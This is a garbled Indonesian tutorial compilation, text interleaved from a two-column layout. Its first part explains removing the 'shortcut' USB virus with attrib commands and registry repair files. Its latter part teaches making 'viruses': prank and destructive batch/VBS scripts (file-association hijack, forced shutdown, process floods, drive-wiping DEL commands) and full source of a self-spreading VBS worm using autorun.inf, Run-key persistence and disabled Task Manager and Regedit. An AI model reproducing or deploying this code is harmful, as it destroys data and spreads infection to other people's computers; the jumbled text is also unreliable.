Cara Membersihkan Virus Shortcut Tanpa

Antivirus

Viru Shortcut/Ramnit adalah virus yang paling sukses menyebar di

tahun 2011, dengan kemampuan update layaknya program antivirus
Ramnit berhasil mengecoh system scanner program antivirusVirus
yang muncul akhir bulan Januari 2011 ini mempunyai kemampuan
untuk menginjeksi file yang mempunyai ekstensi EXE dan DLL baik
berupa file program aplikasi maupun file system Windows. cukup jelas
penjelasan virus shortcut langsung aja disini saya akan berbagi trik
cara membersihkan virus shortcut tanpa antivirus di komputer , 4. Ketik attrib -s -r -h /s /d lalu enter iitu perintah untuk
flasdisk anda. berikut saya memberi contoh untuk membersihkan virus mengembalikan folder yang terkena virus shortcut
shortcut di flashdisk :

1. buka RUN pada komputer anda

2.ketik cmd kemudian Ok / Enter

5.kemudian lihat folder asli anda kembali lgi tinggal hapus aja folder
shortcut anda
3.Masuk ke drive Flashdisknya misalnya di drive E (tergantung drive
flashdisknya muncul )dengan cara ketik E: lalu enter
Sama saja kok cara membersihkan virus shortcut di komputer. Semoga
Bermanfaat .

Ikuti langkah-langkah diatas dan Untuk melakukannya melewati

regedit dari window run..ikuti pa yang ada pada notepad diatas
tetapi kita harus menghapus file virus yang biasanya formatnya .vbs
atau .bach untuk menghapusnya ikuti langkah berikut ini:
c,user, nama komputer anda,AppData,Local,Temp
Kemudian cari file virus dan hapus. Bila tidak tampak AppData
maka show hidden file.
Cara Ke 2 Membersihkan Virus Shortcut Tanpa Copy program dibawah ini pada notepad:
++++++++++++
Antivirus [Version]

Signature=$Chicago$
Sekarang bagaimana bila computer kita yang terkena virus shortcut Provider=Vaksincom
sehingga flashdisk yang nyolok dikomputer atau laptop kiat langsung
menjadi shortcut menjengkelllllkannnn bukan ni kawan saya bagi [DefaultInstall]
formulanyaPerthatikan notepad dibawah ini : AddReg=UnhookRegKey

DelReg=del

[UnhookRegKey]
 HKLM, Software\CLASSES\batfile\shell\open\command,,,"%1 %*

HKLM, Software\CLASSES\comfile\shell\open\command,,,"%1 %* Kemudian jika program dalm komputer anda ada yang eror maka
perbaiki dengan :
HKLM, Software\CLASSES\exefile\shell\open\command,,,"%1 %* Copy program dibawah ini pada notepad:
HKLM, Software\CLASSES\piffile\shell\open\command,,,"%1 %* ++++++++++++
Windows Registry Editor Version 5.00
HKLM, Software\CLASSES\regfile\shell\open\command,,,regedit.exe %1
[HKEY_CLASSES_ROOT\.exe]
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"%1 %* @="exefile"
"Content Type"="application/x-msdownload"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,
NoDriveTypeAutoRun,0x000000ff,255 [HKEY_CLASSES_ROOT\.exe\PersistentHandler]
@="{098f2470-bae0-11cd-b579-08002b30bfeb}"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,
NoDriveTypeAutoRun,0x000000ff,255 [HKEY_CLASSES_ROOT\exefile]
@="Application"
"EditFlags"=hex:38,07,00,00
++++++++++++++++++++++++++ "TileInfo"="prop:FileDescription;Company;FileVersion"
"InfoTip"="prop:FileDescription;Company;FileVersion;Create;Size"
Hasilnya seperti dibawah ini :
[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
@="%1"

[HKEY_CLASSES_ROOT\exefile\shell]

[HKEY_CLASSES_ROOT\exefile\shell\open]
"EditFlags"=hex:00,00,00,00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"

[HKEY_CLASSES_ROOT\exefile\shell\runas]

[HKEY_CLASSES_ROOT\exefile\shell\runas\command]
@="\"%1\" %*"

[HKEY_CLASSES_ROOT\exefile\shellex]

[HKEY_CLASSES_ROOT\exefile\shellex\DropHandler]
@="{86C86720-42A0-1069-A2E8-08002B30309D}"

[HKEY_CLASSES_ROOT\exefile\shellex\PropertySheetHandlers]

[HKEY_CLASSES_ROOT\exefile\shellex\PropertySheetHandlers\PEAnalyser]
@="{09A63660-16F9-11d0-B1DF-004F56001CA7}"

[HKEY_CLASSES_ROOT\exefile\shellex\PropertySheetHandlers\PifProps]
@="{86F19A00-42A0-1069-A2E9-08002B30309D}"
Simpan dengan nama REPAIR.INF (terserah disimpan dimana) [HKEY_CLASSES_ROOT\exefile\shellex\PropertySheetHandlers\ShimLayer Property Page]
Jalankan program REPAIR.INF dengan klik 2 kali @="{513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8}"
+++++++++++++++++++++++++++

Cara Mengembalikan File Yang

Disembunyikan Virus di Flashdisk
Hasilnya seperti dibawah ini:
Pastinya kamu bakalan kaget saat mendapati file-file dokumen dan
foto di flashdiskkamu tiba-tiba hilang setelah pulang dari warnet atau
habis mengambil/mengcopy data dari komputer atau laptop temen.
Dan tidak lama kemudian, tiba-tiba saja file dokumen/foto itu muncul
kembali di flashdisk, namun telah dieksekusi menjadi file dengan
ekstensi EXE. Itu tandanya flashdisk kamu terserang virus. Bisa
Trojan, Worm atau Sality. Kejadian ini sering saya alami sehabis
ngambil data di warnet.

Sebetulnya semua data asli masih ada dan tidak hilang,

hanya disembunyikan oleh virus tersebut. Nah, untuk
mengembalikan file yang disembunyikan virus tadi, kita bisa
melakukannya secara manual melalui Command Prompt.

Caranya :
Masuk ke menu Start >> All Programs >> Accessories >>
Command Prompt
Setelah itu ketikkan letak drive-nya, misalnya flashdisk itu ada
di driveE, F, J atau K, tergantung partisi yang ada di kompi Anda.
Lalu ketikkan DIR, maka muncullah file-file kita yang ada di
flashdisk, jadi misalkan flasdsik ada di drive F, maka tampilan di
File disimpan dengan format .reg . missal perbaiki.reg layar adalahE:\DIR lalu ENTER.
Buka program tersebut dengan regedit dan jalankan selesai deh
 yangdisebunyikan oleh virus, akan dimunculkan kembali. Jadi kita
tidak perlu berlama-lama memunculkan setiap jenis file satu per satu
seperti pada cara pertama di atas.

Mungkin ada cara lain yang lebih mudah dan praktis dari cara di atas?

Nah cara mengembalikannya adalah kita harus tahu dulu ekstensi

word itu adalah "doc" dan untuk foto adalah "jpg/png". Sebagai
contoh, jika di flashdisk kamu sekarang ada file dokumen dengan
nama "dokumenku.exe" padahal tadinya adalah "dokumen.doc", maka
cara memunculkannya dapat dilakukan dengan perintah :

attrib -S -H -A *.doc lalu tekan ENTER

Buat virus yuuuuuuuuuuuuuukkkkk

Begitu juga ketika file aslinya adalah foto dan berubah dengan
ekstensi EXE, maka kode *.doc di atas tinggal diganti dengan *.jpg.
Misalnya "fotoku.exe", maka seluruh file foto yang berformat JPG, akan
kembali dimunculkan (terlihat).

Cara lain yang lebih cepat adalah dengan menggunakan kode

perintah *.*
attrib -S -H -A *.* lalu tekan ENTER
Tips dan trik membuat virus di komputer
Dengan kode ini, maka seluruh jenis format file (doc, jpg, png, dll)
 start
Nah sobat kali ini saya akan share cara membuat virus menggunakan
notepad dan cmd. Virus ini bisa digunakan untuk ngerjain teman dan ada start
juga yang cukup berbahaya sobat, saya share ini hanya sekedar ingin berbagi
pengetahuan kepada sobat sekalian, siapa tau berguna dan bermanfaat bagi start
sobat dan supaya sobat juga tau kalau notepad dan cmd bawaan dari
windows bisa digunakan untuk membuat virus. oke sobat, langsung akan start
saya jelaskan...
start
1. Saya akan menjelaskan cara membuat virus menggunakan CMD : Buka
program cmd nya melalui klik start - run - ketik cmd atau bisa melalui start
keyboard dengan mengetik key windows + R lalu ketik cmd dan dan tekan Nah, selanjutnya simpan di notepad dengan nama apa saja dengan
enter lalu ketikan script berikut di cmd "ASSOC.exe=.hank" tanpa tanda petik exstensi .bat contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti
lalu tekan enter! nah, ini membuat program/aplikasi yang berexstensi .exe menjadi All Files. Trik ini membuat komputer menjadi eror, karena akan
tidak mau jalan, seperti game, dll. Tapi tenang, ini bisa dikembalikan seperti membuka CMD yang banyak jika file "eror.bat" itu di buka.
semuala dengan cara buka cmd nya lagi lalu ketik "ASSOC.exe=EXEFILE" trik
ini bisa untuk ngerjain teman sobat, ya cuma buat iseng-iseng. 3. Masih di notepad, sekarang saya akan jelaskan cara membuat notepad
terbuka secara otomatis, silahkan ketik/ copas kode script berikut ke
notepad :
2. Sekarang saya akan menjelaskan cara membuat virus
menggunakan Notepad : Buka notepad nya melalui start - all programs - @ECHO off
accessories - notepad kemudian ketik kode script berikut ke notepad : :top
------ START %SystemRoot%\system32\notepad.exe
start GOTO top

start Simpan di notepad dengan nama apa saja dengan exstensi .bat sama seperti
yang tadi, contoh "eror.bat" tanpa tanda kutip dan Save As Type ganti
start menjadi All Files. Trik ini akan membuat notepad terbuka dengan sendirinya
secara otomatis.
start
4. Masih menggunakan notepad, yang sekarang cara membuat tombol
start backspace menjadi eror menekan terus menerus secara otomatis, langsung
saja copas/ketik kode script berikut ke notepad :
start
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell") 6. Trik kali ini bisa membuat Caps Lock menyala terus menerus tak terkendali,
do langsung saja copas/ketik kode script berikut di notepad :
wscript.sleep 100
wshshell.sendkeys "{bs}" Set wshShell =wscript.CreateObject("WScript.Shell")
loop do
wscript.sleep 100
Simpan kode script tersebut di notepad dengan nama apa saja yang penting wshshell.sendkeys "{CAPSLOCK}"
tidak lupa menuliskan exstensi .vbs contoh : "eror.vbs" tanpa tanda kutip dan loop
Save As Type ganti menjadi Al Files. Trik ini membuat tombol backspace
menjadi eror dan menekan dengan sendiri nya. Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs
contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika File ini di
5. Masih menggunakan notepad, trik sekarang bisa membuat CD/DVD Room buka akan membuat Caps Lock menyala terus menerus.
buka tutup dengan sendiri nya, langsung aja copas/ketik kode script berikut
ke notepad : 7. Trik yang ke tujuh, membuat komputer menjadi shoutdown dengan kata
lain mati, langsung saja ini script nya copas ke notepad :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection @echo off
do msg * I don't like you
if colCDROMs.Count >= 1 then shutdown -c "Error! You are too ******!" -s
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs
Next contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika file ini di
For i = 0 to colCDROMs.Count - 1 buka akan membuat komputer shoutdown atau mati.
colCDROMs.Item(i).Eject
Next 8.Trik yang ini sama dengan trik yang nomor 7 hanya saja yang ini isi waktu,
End If langsung saja copas/ketik kode script berikut ke notepad :
wscript.sleep 5000 @echo shutdown -s -t 1 -f
loop Simpan kode script tersebut dengan nama bebas dan dengan exstensi .bat
lain dengan trik yang no 7, contoh : "eror.bat" tanpa tanda kutip dan Save As
Simpan kode tersebut di notepad dengan nama bebas dan tambahkan Type ganti menjadi All Files, Maka jika file ini dibuka akan sama dengan no 7
exstensi .vbs contoh : "eror.vbs" dan Save As Type ganti menjadi All Files, yaitu membuat komputer Shoutdown, hanya saja yang membedakan adalah
maka akan bisa membuat CD/DVD Room buka tutup dengan sendirinya yang ini berisi waktu, lihat angka pada kode script tersebut yang berwarna
secara otomatis.
biru, itu adalah waktu yang dibutuhkan untuk mematikan komputer, bisa di
atur sesuai keinginan (1 = 1 detik)
9. Kali ini trik yang lumayan berbahaya, karena komputer akan dipenuhi oleh
100000000
Simpan dengan nama bebas dan exstensi .bat contoh "virus.bat" tanpa tanda
kutip dan Save As Type ganti menjadi All Files dan simpan , tapi JANGAN
DIKLIK karena bisa berakibat fatal bagi komputer anda.

tourstart yang akan memenuhi layar monitor dan akan membuat komputer
menjadi hang,
untuk mengatasinya dapat mendelete semua tourstart tersebut atau
langsung merestart
komputer. Silahkan copas/ketik kode script berikut ke notepad :

option explicit
dim wshshell
set wshshell=wscript.createobject(wscript.shell)
dim x
for x = 1 to 100000000
wshshell.run tourstart.exe agar dapat dipergunakan dengan baik, dan agar sobat dapat berhati-hati jika
next melihat ada file di komputer sobat yang berexstensi .bat atau .vbs siapa tau
teman atau orang dekat sobat iseng-iseng ngerjain...
Simpan dengan nama bebas dan dengan exstensi .vbs contoh : "virus.vbs"
tanpa tanda kutip dan Save As type ganti menjadi All Files. Pada angka yang
saya beri wara biru, itu bisa di ganti sesuai keinginan, bisa dibuat menjadi
100 atau 1000 saja, dan begitu file ini dibuka akan membuat tourstart sesuai Cara membuat virus berbahaya heee hee
dengan angka yang ditulis pada kode tesebut,
Trik Tips Membuat Virus Dengan Cepat
10. Nah Yang terakhir ini, saya rasa paling berbayaha, karena dapat ini adalah lanjutan artikel sebelunya yaitu Cara Membuat Virus Dengan
menghapus seluruh data di hardisk tanpa terkecuali, sehingga mau tidak mau Notepad buat sobat semua yang ingin belajar membuat virus yang ganas
atau Mematikan , sobat bisa pelajari disini walawpun kurang sempurna tapi
ya harus instal ulang, langsung saja copas/ketik kode script berikut di
setidaknya bisa sobat pelajari dengan lebih dalam lagi bagaimana Cara
notepad : Membuat Virus Ganas Berbahaya untuk Komputer atau laptop. disarankan
untuk siap siap instal ulang deh kalo seandainya terjadi apa apa akibat Virus
@echo off Berbahaya untuk Laptop ini. karena tidak sedikit yang berusaha membuat
virus dan belum mengerti seleuk beluk kerjanya virus ehh malah senjata
DEL C: -Y
makan tuan :D nah sobat ndak mau kan kalo sampai begitu, untuk jaga jaga
DEL D: -Y siapin dah dvd windows 7 nya untuk instal ulang.
 rekur = rekur & vbcrlf
loop
do
//-Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & \batch- YouDieXplr.dll.vbs )
tf.attributes = 32
set tf=fs.createtextfile(windowpath & \batch- YouDieXplr.dll.vbs,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & \batch- YouDieXplr.dll.vbs )
tf.attributes = 39
//-Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc
tercolok-//
Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
//-Cek Drive-//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path
Cara Membuat Virus Komputer Ganas <> A: then
//-Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\-//
Virus Ganas Berbahaya ini akan membuat dirinya menyebar ke removable set tf=fs.getfile(flashdrive.path &\YouDieXplr.dll.vbs )
disc dengan AutoRun sehingga komputer lain yang tercolok flash disc tf.attributes =32
terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan set tf=fs.createtextfile(flashdrive.path &\YouDieXplr.dll.vbs ,2,true)
infector-nya. Virus ini saya beri nama YouDieCbrXplr.VBS. Sekarang buka tf.write rekursif
Notepad-nya. Copy kode berikut : tf.close
set tf=fs.getfile(flashdrive.path &\YouDieXplr.dll.vbs )
//-Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian tf.attributes = 39
lanjutkan kegiatan virus-// //-Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto
on error resume next Setup Information)-//
//-Dim kata-kata berikut ini-// set tf =fs.getfile(flashdrive.path &\autorun.inf)
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,YouDieCbrXplr,nt,check,sd tf.attributes = 32
//-Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup set tf=fs.createtextfile(flashdrive.path &\autorun.inf,2,true)
Information-// tf.write isi
isi = [autorun] & vbcrlf & shellexecute=wscript.exe YouDieXplr.dll.vbs tf.close
set fs = createobject(Scripting.FileSystemObject) set tf = fs.getfile(flashdrive.path &\autorun.inf)
set mf = fs.getfile(Wscript.ScriptFullname) tf.attributes=39
dim text,size end if
size = mf.size next
check = mf.drive.drivetype //-Manipulasi Registry-//
set text = mf.openastextstream(1,-2) set YouDieCbrXplr = createobject(WScript.Shell)
do while not text.atendofstream
//-Manip Ubah Title Internet Explorer menjadi THE YOUDIECBRXPLR v.s.
rekur = rekur & text.readline
ZAY-//
YouDieCbrXplr.regwrite HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title, THE YOUDIECBRXPLR v.s. ZAY
//-Manip Set agar file hidden tidak ditampilkan di Explorer-//
YouDieCbrXplr.RegWrite
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\E
xplorer\Advanced\Hidden, 0, REG_DWORD
//-Manip Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit
dan Task Manager-//
YouDieCbrXplr.RegWrite
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\E
xplorer\NoFind, 1, REG_DWORD
YouDieCbrXplr.RegWrite
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\E
xplorer\NoFolderOptions, 1, REG_DWORD
YouDieCbrXplr.RegWrite
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\E
xplorer\NoRun, 1, REG_DWORD
YouDieCbrXplr.RegWrite
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\S
ystem\DisableRegistryTools, 1, REG_DWORD
YouDieCbrXplr.RegWrite
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\S
ystem\DisableTaskMgr, 1, REG_DWORD
//-Manip Disable klik kanan-//
YouDieCbrXplr.RegWrite
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\E
xplorer\NoViewContextMenu, 1, REG_DWORD
//-Manip Munculkan Pesan Setiap Windows Startup-//
YouDieCbrXplr.regwrite
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
\LegalNoticeCaption, Worm YouDieCbrXplr. Variant from Rangga-Zay, dont
panic all data are safe.
//-Manip Aktif setiap Windows Startup-//
YouDieCbrXplr.regwrite
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Syst
emdir, windowpath & \batch- YouDieXplr.dll.vbs
//-Manip Ubah RegisteredOwner dan Organization-//
YouDieCbrXplr.regwrite
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOrganization, The Batrix
YouDieCbrXplr.regwrite
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOwner,YouDieCbrXplr
//-Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk
menjelaskan-//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(Wscript.shell)
sd.run windowpath & \explorer.exe /e,/select, & Wscript.ScriptFullname
Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih All
Files (*.*). Simpan dengan nama : YouDieXplr.dll.vbs. Sebenarnya gak usah
pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
Demikian untuk Cara Membuat Virus Komputer Berbahaya , semoga
tidak terjadi apa apa sama komputernya ya.. hehe untuk cara lebih mudah
ada juga Software Untuk Membuat Virus nanti pasti posting.